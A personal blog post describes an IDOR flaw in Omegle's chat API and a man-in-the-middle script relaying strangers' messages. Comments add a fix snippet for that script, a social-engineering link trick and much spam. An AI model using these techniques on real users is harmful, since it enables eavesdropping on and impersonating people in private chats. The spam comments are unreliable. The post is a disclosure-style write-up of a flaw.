You: POST omegle.com/start
Omg: HTTP "123456" <-- random 6 digit 'username' (a-z A-Z 0-9 _ -)
You: POST omegle.com/events?id=123456
Omg: HTTP [["connected"]]
You: POST omegle.com/send?msg=hello&id=123456
Omg: HTTP win <-- funny
You: POST omegle.com/events?id=123456
Omg: HTTP [["gotMessage", "hey"]] <-- message from other person
...
You: POST omegle.com/disconnect?id=123456 <-- quit the chat
Seeing this immediately sparked some thought. Can I request events for other users? Can I send messages to other users? Can I disconnect other users? It seemed all you needed to do was post the command with the user id you wanted to receive events for. As it turns out its almost even better. If you post for events using someone elses user id it will "implode" their chat:
Whats better is that the other person is still connected and they have no idea that their 'stranger' has been imploded. Now you can keep talking to the other person and they have no idea what just happened.
There is one major problem with this however. According to:
http://omegle.com/count
there are on average only about 3k users online at a given time, but the number of possible user ids are
(26+26+10+1+1)^6 = 68,719,476,736
That is a terrible chance of you finding someone quickly. I actually started making a brute forcer (omegle_brute_force.py) but quickly realized that this was an ill fated attempted.
So if you cant find the users, why not have the users come to you? I realized that Omegle would be prime for a classic man in the middle attack. The idea is super simple. I would connect to two strangers just like normal, but instead of me talking to them they would talk to each other through me. As long as I don't inject any messages or anything weird they should have no idea that I'm even there. Here is how the program looks:
As you can see I am having a legit connection to both client 1 and client 2, but I am transparently passing their messages right through me to the other person.
Doing this was kinda tricky. Whenever you POST for events it blocks until the read is fulfilled. This means that with a single threaded program each person would have to take turns talking since the program would block every time I polled for their messages. Even most two threaded setups have the same problem. The solution I came up with I feel works pretty well. There are four total threads:
1) Sending to client 1
2) Receiving from client 1
3) Sending to client 2
4) Receiving from client 2
Every time the receive thread gets a message it queues it into a stack, so that the sending thread can retrieve the message at its leisure. The result? It doesn't matter if a POST blocks because the sender thread can still work through the queue and the other threads can still send and receive messages.
A classic man in the middle attack:
This has some interesting possibilities. I can send messages to one of the clients at the others behalf and the person will have no idea that I sent it. Also what about connecting more then 2 people together? There is no reason I couldn't connect multiple people together in a chat and maybe even append a user tag to each of their messages.
Omegle is a pretty interesting site, and you gotta hand it to Leif K-Brooks for (apparently) single handedly making such a propular site at only 18. I hope that he can implement some needed security to Omegle to prevent this kind of attack in the future.
Download my programs here [mirror].
omegle_man_in_middle.py - program described above
omegle_brute_force.py - attempts to guess user ids and post for events
omegle_class.py - generic class for interacting with omegle
omegle_connect_view.py - connect to omegle and posts for events
omegle_multi_connect.py - connects to multiple people at once. proof of concept that multi connections can be made
omegle_send.py - send messages using a user id
EDIT:
Found another omegle man in the middle attack written in perl [here]
very very interesting ,, gr8 article
ReplyDeletehi, seems that link to ur python scripts doesn't work anymore :( could u please reupload it?
ReplyDelete@anon
ReplyDeleteSorry idk what's going on with my schools hosting it put up a mirror
thanx for quick reaction ;) but...i dunno if problem is with my connection... it throws me HTTP 101 ERR_CONNECTION_RESET on that mirror :(
ReplyDelete@anon
ReplyDeleteOpps! Sorry had the wrong port in the link, try it now it should be good
thx a lot man... i was trying to make js web client which would connect to omegle and have this nice features... but looks like i'm stuck with limitation, that XMLHTTPRequests can be sent only to your own domain... maybe i'll solve it... dunno :) but for now i'm giving up i quess...
ReplyDeletereally great and useful article , Keep up the good work ;-)
ReplyDeleteMax
ReplyDeleteOmegle has changed slightly and the scripts are broken.
I fixed omegle_man_in_middle.py thus:
params_start = urlencode({'rcs':"1",'spid':''})
con_one.request("POST", "/start", params_start, headers)
con_two.request("POST", "/start", params_start, headers)
I don't know if those parameters were ever used on omegle before but they are necessary now. The site has added a video chat feature, this may be the reason.
Also note that a GET request to start also returns an ID; so you could just use
con_one.request("GET", "/start", 0, headers)
etc
hey very informative article here. I was on omegle and some son of a bitch found out my facebook username. any idea how they did that? is it even possible theoretically? or am I more likely dealing with a script kiddie who I personally know and has a grudge against me?
ReplyDeleteThe SOB didn't really find out your user name, though it can rattle your nerves when they do that! I spent a bit of time looking into the possibilities, and unlike chatroulette (which does connect users directly and thus exposes your outward facing IP address), all communication on omegle is between you and omegle's system. There isn't anything that you don't type that the person on the other end can get.
ReplyDeleteAs for how it was done, it's an 'exploit' of the fact that if a user (you in this case) is logged into FaceBook in another tab, in the same browser, and select a link that is of the form
http://www.facebook.com/profile.php?id=2018293050400
Facebook will present the user's own profile page. If the user is not logged into Facebook, then the login page is displayed. Everything from the question mark and right is fluff that is ignored, but makes it look like the person found a legit link.
Rest easy and know that your computer wasn't accessed (this time). In general, it's just as risky to click on links that are sent to you via omegle as it would be to click on something sent to you in an email.
Have a great day!
Similar idea; http://kitakitsune.org/texty/rc0d3z/omegleProxy.html
ReplyDeletedo you know omegle chat script>?for developing a chat website..
ReplyDeleteI wonder if you fixed your script for their new updates?
ReplyDeleteWas wondering the same thing :P just discovered this. I found the problem wasnt connecting or receiving messages. It was parsing them "through" me to the opposite user. What happens is I receive all the messages but the other person never receives his/her reply. I may fix this myself if you wouldnt mind.
ReplyDeleteDear Bear24rw.
ReplyDeleteI think you should consider using apostrophes in your contributions. They would make you appear a lot more intelligent.
Omegle ile doyumsuz kameralı chat sizleri bekliyor
ReplyDeleteOmegle TÜRKÇE ile doyumsuz kameralı chat sizleri bekliyor
ReplyDeleteOmegle ile rastgele chat %100 canlı
so does this still work? how do you run it? new to python.
ReplyDelete
ReplyDeleteApp Cloner for Android is an application that will allow you to make exact copies of any app on your smartphone or tablet.
Nice Blog!
ReplyDeleteOracle ADF Interview Questions and Answers
Oracle BPM Interview Questions and Answers
Oracle DataGuard Interview Questions and Answers
We wish you the best
ReplyDeleteشركة مكافحة حشرات بالقصيم
شركة مكافحة حشرات بينبع
شركة مكافحة حشرات بالخرج
gomovies
ReplyDeletefinance whatsapp groups
ReplyDelete
ReplyDeleteGreat blog !It is best institute.Top Training institute In chennai
http://chennaitraining.in/openspan-training-in-chennai/
http://chennaitraining.in/uipath-training-in-chennai/
http://chennaitraining.in/automation-anywhere-training-in-chennai/
http://chennaitraining.in/microsoft-azure-training-in-chennai/
http://chennaitraining.in/workday-training-in-chennai/
http://chennaitraining.in/vmware-training-in-chennai/
This is an awesome post. Really very informative and creative content. Thanks for sharing!
ReplyDeleteinternship for web development | internship in electrical engineering | mini project topics for it 3rd year | online internship with certificate | final year project for cse
No doubt this is an excellent post I got a lot of knowledge after reading good luck. Theme of blog is excellent there is almost everything to read, Brilliant post. free chat
ReplyDeleteMax Thrun'S Project Blog: Omegle.Com Man In The Middle Attack >>>>> Download Now
ReplyDelete>>>>> Download Full
Max Thrun'S Project Blog: Omegle.Com Man In The Middle Attack >>>>> Download LINK
>>>>> Download Now
Max Thrun'S Project Blog: Omegle.Com Man In The Middle Attack >>>>> Download Full
>>>>> Download LINK jV
bepractical
ReplyDeleteNo doubt this is an excellent post I got a lot of knowledge after reading good luck. Theme of blog is excellent there is almost everything to read, Brilliant post. free chat
ReplyDeletebepractical
Informative for me.... I am Bamo , IT student, prepare for ccsp exam
ReplyDeletewonderful blog. It's very interesting to read...
ReplyDeleteC Programming course at Edukators in Coimbatore
This comment has been removed by the author.
ReplyDeletewonderful blog. It's very interesting to read...
ReplyDeleteAWS Training course at Edukators in Coimbatore
This comment has been removed by the author.
ReplyDeleteAwsome blog. It's very interesting to read...
ReplyDeleteDot Net Training course at Edukators in Coimbatore